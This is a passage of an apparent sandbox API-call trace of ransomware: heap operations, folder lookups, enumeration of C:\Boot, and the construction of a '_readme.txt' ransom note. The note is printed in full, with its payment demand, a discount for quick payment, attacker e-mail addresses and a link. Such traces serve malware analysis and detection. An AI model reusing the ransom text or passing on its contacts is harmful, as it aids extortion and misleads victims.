dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0183.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83840 [0183.415] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.433] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.433] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.433] PathFindFileNameW (pszPath="") returned="" [0183.433] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.434] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.434] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.434] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838e0 | out: hHeap=0x620000) returned 1 [0183.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.434] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0183.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838e0 | out: hHeap=0x620000) returned 1 [0183.434] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0183.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e902a8 [0183.435] lstrcpyW (in: lpString1=0x2e902a8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.435] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.435] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.436] FindFirstFileW (in: lpFileName="C:\\Boot\\*" (normalized: "c:\\boot\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838e0 | out: hHeap=0x620000) returned 1 [0183.437] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.438] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x35246c20, ftLastAccessTime.dwHighDateTime=0x1d8a73e, ftLastWriteTime.dwLowDateTime=0x94d0f2f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0183.438] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x94ce9190, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0183.438] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0183.438] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0183.438] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9571c560, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0183.438] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0183.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83908 [0183.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83930 [0183.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838e0 | out: hHeap=0x620000) returned 1 [0183.439] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, 